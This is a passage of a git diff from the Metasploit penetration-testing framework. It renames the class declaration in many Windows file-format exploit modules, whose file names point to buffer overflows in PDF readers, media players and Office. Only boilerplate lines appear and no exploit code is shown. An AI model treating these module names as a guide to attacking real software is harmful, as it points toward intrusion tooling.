Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/coolpdf_image_stream_bof.rb b/modules/exploits/windows/fileformat/coolpdf_image_stream_bof.rb index fccc7d41b8..fd03303457 100644 --- a/modules/exploits/windows/fileformat/coolpdf_image_stream_bof.rb +++ b/modules/exploits/windows/fileformat/coolpdf_image_stream_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/corelpdf_fusion_bof.rb b/modules/exploits/windows/fileformat/corelpdf_fusion_bof.rb index 4b69deec88..672dd21363 100644 --- a/modules/exploits/windows/fileformat/corelpdf_fusion_bof.rb +++ b/modules/exploits/windows/fileformat/corelpdf_fusion_bof.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex/zip' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/csound_getnum_bof.rb b/modules/exploits/windows/fileformat/csound_getnum_bof.rb index 4ebc1db003..1e45c2bad9 100644 --- a/modules/exploits/windows/fileformat/csound_getnum_bof.rb +++ b/modules/exploits/windows/fileformat/csound_getnum_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/cutezip_bof.rb b/modules/exploits/windows/fileformat/cutezip_bof.rb index 78eb8ed76f..f27d29a44c 100644 --- a/modules/exploits/windows/fileformat/cutezip_bof.rb +++ b/modules/exploits/windows/fileformat/cutezip_bof.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex/zip' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/cyberlink_p2g_bof.rb b/modules/exploits/windows/fileformat/cyberlink_p2g_bof.rb index 8337a917cc..171aa77b96 100644 --- a/modules/exploits/windows/fileformat/cyberlink_p2g_bof.rb +++ b/modules/exploits/windows/fileformat/cyberlink_p2g_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/cytel_studio_cy3.rb b/modules/exploits/windows/fileformat/cytel_studio_cy3.rb index 4f93d12b41..74c7b8f7ea 100644 --- a/modules/exploits/windows/fileformat/cytel_studio_cy3.rb +++ b/modules/exploits/windows/fileformat/cytel_studio_cy3.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/deepburner_path.rb b/modules/exploits/windows/fileformat/deepburner_path.rb index a7e2211515..76ce8452b6 100644 --- a/modules/exploits/windows/fileformat/deepburner_path.rb +++ b/modules/exploits/windows/fileformat/deepburner_path.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/destinymediaplayer16.rb b/modules/exploits/windows/fileformat/destinymediaplayer16.rb index f8ab28c7e0..3535ec9342 100644 --- a/modules/exploits/windows/fileformat/destinymediaplayer16.rb +++ b/modules/exploits/windows/fileformat/destinymediaplayer16.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/digital_music_pad_pls.rb b/modules/exploits/windows/fileformat/digital_music_pad_pls.rb index 8188fe14f0..dde740dc05 100644 --- a/modules/exploits/windows/fileformat/digital_music_pad_pls.rb +++ b/modules/exploits/windows/fileformat/digital_music_pad_pls.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/djstudio_pls_bof.rb b/modules/exploits/windows/fileformat/djstudio_pls_bof.rb index 5ea67b3a48..ae6179ce9b 100644 --- a/modules/exploits/windows/fileformat/djstudio_pls_bof.rb +++ b/modules/exploits/windows/fileformat/djstudio_pls_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/djvu_imageurl.rb b/modules/exploits/windows/fileformat/djvu_imageurl.rb index acdb91e870..1a4afb7f65 100644 --- a/modules/exploits/windows/fileformat/djvu_imageurl.rb +++ b/modules/exploits/windows/fileformat/djvu_imageurl.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = LowRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/dvdx_plf_bof.rb b/modules/exploits/windows/fileformat/dvdx_plf_bof.rb index 8fecdab25c..284effe31b 100644 --- a/modules/exploits/windows/fileformat/dvdx_plf_bof.rb +++ b/modules/exploits/windows/fileformat/dvdx_plf_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/easycdda_pls_bof.rb b/modules/exploits/windows/fileformat/easycdda_pls_bof.rb index 0f70af6d48..5e22d75d04 100644 --- a/modules/exploits/windows/fileformat/easycdda_pls_bof.rb +++ b/modules/exploits/windows/fileformat/easycdda_pls_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/emc_appextender_keyworks.rb b/modules/exploits/windows/fileformat/emc_appextender_keyworks.rb index c22c602790..48e04da124 100644 --- a/modules/exploits/windows/fileformat/emc_appextender_keyworks.rb +++ b/modules/exploits/windows/fileformat/emc_appextender_keyworks.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/erdas_er_viewer_bof.rb b/modules/exploits/windows/fileformat/erdas_er_viewer_bof.rb index 234e3d731c..f63cae9376 100644 --- a/modules/exploits/windows/fileformat/erdas_er_viewer_bof.rb +++ b/modules/exploits/windows/fileformat/erdas_er_viewer_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/erdas_er_viewer_rf_report_error.rb b/modules/exploits/windows/fileformat/erdas_er_viewer_rf_report_error.rb index b9add88f85..d1d7450d78 100644 --- a/modules/exploits/windows/fileformat/erdas_er_viewer_rf_report_error.rb +++ b/modules/exploits/windows/fileformat/erdas_er_viewer_rf_report_error.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/esignal_styletemplate_bof.rb b/modules/exploits/windows/fileformat/esignal_styletemplate_bof.rb index 72f7ee963d..c455d9abe3 100644 --- a/modules/exploits/windows/fileformat/esignal_styletemplate_bof.rb +++ b/modules/exploits/windows/fileformat/esignal_styletemplate_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/etrust_pestscan.rb b/modules/exploits/windows/fileformat/etrust_pestscan.rb index c2a05471d7..0985e0c229 100644 --- a/modules/exploits/windows/fileformat/etrust_pestscan.rb +++ b/modules/exploits/windows/fileformat/etrust_pestscan.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ezip_wizard_bof.rb b/modules/exploits/windows/fileformat/ezip_wizard_bof.rb index 9f4c550a8f..e13df2b8f0 100644 --- a/modules/exploits/windows/fileformat/ezip_wizard_bof.rb +++ b/modules/exploits/windows/fileformat/ezip_wizard_bof.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex/zip' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/fatplayer_wav.rb b/modules/exploits/windows/fileformat/fatplayer_wav.rb index d441e2d86c..38686df93b 100644 --- a/modules/exploits/windows/fileformat/fatplayer_wav.rb +++ b/modules/exploits/windows/fileformat/fatplayer_wav.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/fdm_torrent.rb b/modules/exploits/windows/fileformat/fdm_torrent.rb index ca1b305efe..df64e35035 100644 --- a/modules/exploits/windows/fileformat/fdm_torrent.rb +++ b/modules/exploits/windows/fileformat/fdm_torrent.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/feeddemon_opml.rb b/modules/exploits/windows/fileformat/feeddemon_opml.rb index e349040c48..fd9a115fca 100644 --- a/modules/exploits/windows/fileformat/feeddemon_opml.rb +++ b/modules/exploits/windows/fileformat/feeddemon_opml.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/foxit_reader_filewrite.rb b/modules/exploits/windows/fileformat/foxit_reader_filewrite.rb index 28a0058b6e..f5da05ca0a 100644 --- a/modules/exploits/windows/fileformat/foxit_reader_filewrite.rb +++ b/modules/exploits/windows/fileformat/foxit_reader_filewrite.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/foxit_reader_launch.rb b/modules/exploits/windows/fileformat/foxit_reader_launch.rb index 118eabf760..1f9be2a724 100644 --- a/modules/exploits/windows/fileformat/foxit_reader_launch.rb +++ b/modules/exploits/windows/fileformat/foxit_reader_launch.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/foxit_title_bof.rb b/modules/exploits/windows/fileformat/foxit_title_bof.rb index f3d2833bb2..166a9cfee8 100644 --- a/modules/exploits/windows/fileformat/foxit_title_bof.rb +++ b/modules/exploits/windows/fileformat/foxit_title_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/free_mp3_ripper_wav.rb b/modules/exploits/windows/fileformat/free_mp3_ripper_wav.rb index eec9159bb8..9be4a7dc85 100644 --- a/modules/exploits/windows/fileformat/free_mp3_ripper_wav.rb +++ b/modules/exploits/windows/fileformat/free_mp3_ripper_wav.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/galan_fileformat_bof.rb b/modules/exploits/windows/fileformat/galan_fileformat_bof.rb index 8e9449ca95..7e82c08be2 100644 --- a/modules/exploits/windows/fileformat/galan_fileformat_bof.rb +++ b/modules/exploits/windows/fileformat/galan_fileformat_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/gsm_sim.rb b/modules/exploits/windows/fileformat/gsm_sim.rb index 39df103dfc..e2019f38cc 100644 --- a/modules/exploits/windows/fileformat/gsm_sim.rb +++ b/modules/exploits/windows/fileformat/gsm_sim.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/gta_samp.rb b/modules/exploits/windows/fileformat/gta_samp.rb index 638e0783e6..8fda60248c 100644 --- a/modules/exploits/windows/fileformat/gta_samp.rb +++ b/modules/exploits/windows/fileformat/gta_samp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb b/modules/exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb index 5a9a7f75b5..541f6ac734 100644 --- a/modules/exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb +++ b/modules/exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/hhw_hhp_contentfile_bof.rb b/modules/exploits/windows/fileformat/hhw_hhp_contentfile_bof.rb index c070335d12..b7cb7a9e32 100644 --- a/modules/exploits/windows/fileformat/hhw_hhp_contentfile_bof.rb +++ b/modules/exploits/windows/fileformat/hhw_hhp_contentfile_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/hhw_hhp_indexfile_bof.rb b/modules/exploits/windows/fileformat/hhw_hhp_indexfile_bof.rb index bf59386e3d..24ae5f20f2 100644 --- a/modules/exploits/windows/fileformat/hhw_hhp_indexfile_bof.rb +++ b/modules/exploits/windows/fileformat/hhw_hhp_indexfile_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/homm3_h3m.rb b/modules/exploits/windows/fileformat/homm3_h3m.rb index 98b09221c8..dd83c0b103 100644 --- a/modules/exploits/windows/fileformat/homm3_h3m.rb +++ b/modules/exploits/windows/fileformat/homm3_h3m.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ht_mp3player_ht3_bof.rb b/modules/exploits/windows/fileformat/ht_mp3player_ht3_bof.rb index b2161395c5..468b74316a 100644 --- a/modules/exploits/windows/fileformat/ht_mp3player_ht3_bof.rb +++ b/modules/exploits/windows/fileformat/ht_mp3player_ht3_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ibm_forms_viewer_fontname.rb b/modules/exploits/windows/fileformat/ibm_forms_viewer_fontname.rb index 99009920c2..b4ed4d9963 100644 --- a/modules/exploits/windows/fileformat/ibm_forms_viewer_fontname.rb +++ b/modules/exploits/windows/fileformat/ibm_forms_viewer_fontname.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include REXML diff --git a/modules/exploits/windows/fileformat/ibm_pcm_ws.rb b/modules/exploits/windows/fileformat/ibm_pcm_ws.rb index b12e02856f..9040c45a16 100644 --- a/modules/exploits/windows/fileformat/ibm_pcm_ws.rb +++ b/modules/exploits/windows/fileformat/ibm_pcm_ws.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking # ASLR+DEP bypass include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/icofx_bof.rb b/modules/exploits/windows/fileformat/icofx_bof.rb index c0862e909b..0d4f157193 100644 --- a/modules/exploits/windows/fileformat/icofx_bof.rb +++ b/modules/exploits/windows/fileformat/icofx_bof.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ideal_migration_ipj.rb b/modules/exploits/windows/fileformat/ideal_migration_ipj.rb index ef022f1a11..6e76f51aff 100644 --- a/modules/exploits/windows/fileformat/ideal_migration_ipj.rb +++ b/modules/exploits/windows/fileformat/ideal_migration_ipj.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/iftp_schedule_bof.rb b/modules/exploits/windows/fileformat/iftp_schedule_bof.rb index 2c4beb765c..29df9fcdd0 100644 --- a/modules/exploits/windows/fileformat/iftp_schedule_bof.rb +++ b/modules/exploits/windows/fileformat/iftp_schedule_bof.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/irfanview_jpeg2000_bof.rb b/modules/exploits/windows/fileformat/irfanview_jpeg2000_bof.rb index 7893072efb..aebb884c39 100644 --- a/modules/exploits/windows/fileformat/irfanview_jpeg2000_bof.rb +++ b/modules/exploits/windows/fileformat/irfanview_jpeg2000_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ispvm_xcf_ispxcf.rb b/modules/exploits/windows/fileformat/ispvm_xcf_ispxcf.rb index 16585dd5cd..55699fcecf 100644 --- a/modules/exploits/windows/fileformat/ispvm_xcf_ispxcf.rb +++ b/modules/exploits/windows/fileformat/ispvm_xcf_ispxcf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/kingview_kingmess_kvl.rb b/modules/exploits/windows/fileformat/kingview_kingmess_kvl.rb index 322cebfa70..4bc326cf3c 100644 --- a/modules/exploits/windows/fileformat/kingview_kingmess_kvl.rb +++ b/modules/exploits/windows/fileformat/kingview_kingmess_kvl.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/lattice_pac_bof.rb b/modules/exploits/windows/fileformat/lattice_pac_bof.rb index 80a5d898af..7af09b6327 100644 --- a/modules/exploits/windows/fileformat/lattice_pac_bof.rb +++ b/modules/exploits/windows/fileformat/lattice_pac_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/lotusnotes_lzh.rb b/modules/exploits/windows/fileformat/lotusnotes_lzh.rb index f54e929612..2c46655a13 100644 --- a/modules/exploits/windows/fileformat/lotusnotes_lzh.rb +++ b/modules/exploits/windows/fileformat/lotusnotes_lzh.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/magix_musikmaker_16_mmm.rb b/modules/exploits/windows/fileformat/magix_musikmaker_16_mmm.rb index 86d62d642c..aaaa68e5e4 100644 --- a/modules/exploits/windows/fileformat/magix_musikmaker_16_mmm.rb +++ b/modules/exploits/windows/fileformat/magix_musikmaker_16_mmm.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/mcafee_hercules_deletesnapshot.rb b/modules/exploits/windows/fileformat/mcafee_hercules_deletesnapshot.rb index cd8344449a..a210a5ddad 100644 --- a/modules/exploits/windows/fileformat/mcafee_hercules_deletesnapshot.rb +++ b/modules/exploits/windows/fileformat/mcafee_hercules_deletesnapshot.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = LowRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/mcafee_showreport_exec.rb b/modules/exploits/windows/fileformat/mcafee_showreport_exec.rb index a79e8761fb..41af41ef90 100644 --- a/modules/exploits/windows/fileformat/mcafee_showreport_exec.rb +++ b/modules/exploits/windows/fileformat/mcafee_showreport_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/mediacoder_m3u.rb b/modules/exploits/windows/fileformat/mediacoder_m3u.rb index 58edeea6cf..9a91b041e3 100644 --- a/modules/exploits/windows/fileformat/mediacoder_m3u.rb +++ b/modules/exploits/windows/fileformat/mediacoder_m3u.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/mediajukebox.rb b/modules/exploits/windows/fileformat/mediajukebox.rb index bc083ea75c..e6bf891a76 100644 --- a/modules/exploits/windows/fileformat/mediajukebox.rb +++ b/modules/exploits/windows/fileformat/mediajukebox.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/microp_mppl.rb b/modules/exploits/windows/fileformat/microp_mppl.rb index b6b7deb185..d2b6298122 100644 --- a/modules/exploits/windows/fileformat/microp_mppl.rb +++ b/modules/exploits/windows/fileformat/microp_mppl.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/millenium_mp3_pls.rb b/modules/exploits/windows/fileformat/millenium_mp3_pls.rb index 4c56535829..aaa749cc1f 100644 --- a/modules/exploits/windows/fileformat/millenium_mp3_pls.rb +++ b/modules/exploits/windows/fileformat/millenium_mp3_pls.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/mini_stream_pls_bof.rb b/modules/exploits/windows/fileformat/mini_stream_pls_bof.rb index 26e72a76ac..45c708b636 100644 --- a/modules/exploits/windows/fileformat/mini_stream_pls_bof.rb +++ b/modules/exploits/windows/fileformat/mini_stream_pls_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/mjm_coreplayer2011_s3m.rb b/modules/exploits/windows/fileformat/mjm_coreplayer2011_s3m.rb index 895bc0e722..06133dcc58 100644 --- a/modules/exploits/windows/fileformat/mjm_coreplayer2011_s3m.rb +++ b/modules/exploits/windows/fileformat/mjm_coreplayer2011_s3m.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/mjm_quickplayer_s3m.rb b/modules/exploits/windows/fileformat/mjm_quickplayer_s3m.rb index 7146407423..95dff30b96 100644 --- a/modules/exploits/windows/fileformat/mjm_quickplayer_s3m.rb +++ b/modules/exploits/windows/fileformat/mjm_quickplayer_s3m.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/moxa_mediadbplayback.rb b/modules/exploits/windows/fileformat/moxa_mediadbplayback.rb index 5871055937..b1d56c8738 100644 --- a/modules/exploits/windows/fileformat/moxa_mediadbplayback.rb +++ b/modules/exploits/windows/fileformat/moxa_mediadbplayback.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking diff --git a/modules/exploits/windows/fileformat/mplayer_m3u_bof.rb b/modules/exploits/windows/fileformat/mplayer_m3u_bof.rb index d1ad362615..5565d239b8 100644 --- a/modules/exploits/windows/fileformat/mplayer_m3u_bof.rb +++ b/modules/exploits/windows/fileformat/mplayer_m3u_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/mplayer_sami_bof.rb b/modules/exploits/windows/fileformat/mplayer_sami_bof.rb index afd3a993ae..563806e43f 100644 --- a/modules/exploits/windows/fileformat/mplayer_sami_bof.rb +++ b/modules/exploits/windows/fileformat/mplayer_sami_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ms09_067_excel_featheader.rb b/modules/exploits/windows/fileformat/ms09_067_excel_featheader.rb index 260d01b1d2..01127ad7e2 100644 --- a/modules/exploits/windows/fileformat/ms09_067_excel_featheader.rb +++ b/modules/exploits/windows/fileformat/ms09_067_excel_featheader.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/ole' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ms10_004_textbytesatom.rb b/modules/exploits/windows/fileformat/ms10_004_textbytesatom.rb index 24dfc03cf6..3e903cfb6a 100644 --- a/modules/exploits/windows/fileformat/ms10_004_textbytesatom.rb +++ b/modules/exploits/windows/fileformat/ms10_004_textbytesatom.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/ole' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ms10_038_excel_obj_bof.rb b/modules/exploits/windows/fileformat/ms10_038_excel_obj_bof.rb index 27c7ddfc8b..c38c4f6694 100644 --- a/modules/exploits/windows/fileformat/ms10_038_excel_obj_bof.rb +++ b/modules/exploits/windows/fileformat/ms10_038_excel_obj_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ms10_087_rtf_pfragments_bof.rb b/modules/exploits/windows/fileformat/ms10_087_rtf_pfragments_bof.rb index 757d29486c..1a7ec7195a 100644 --- a/modules/exploits/windows/fileformat/ms10_087_rtf_pfragments_bof.rb +++ 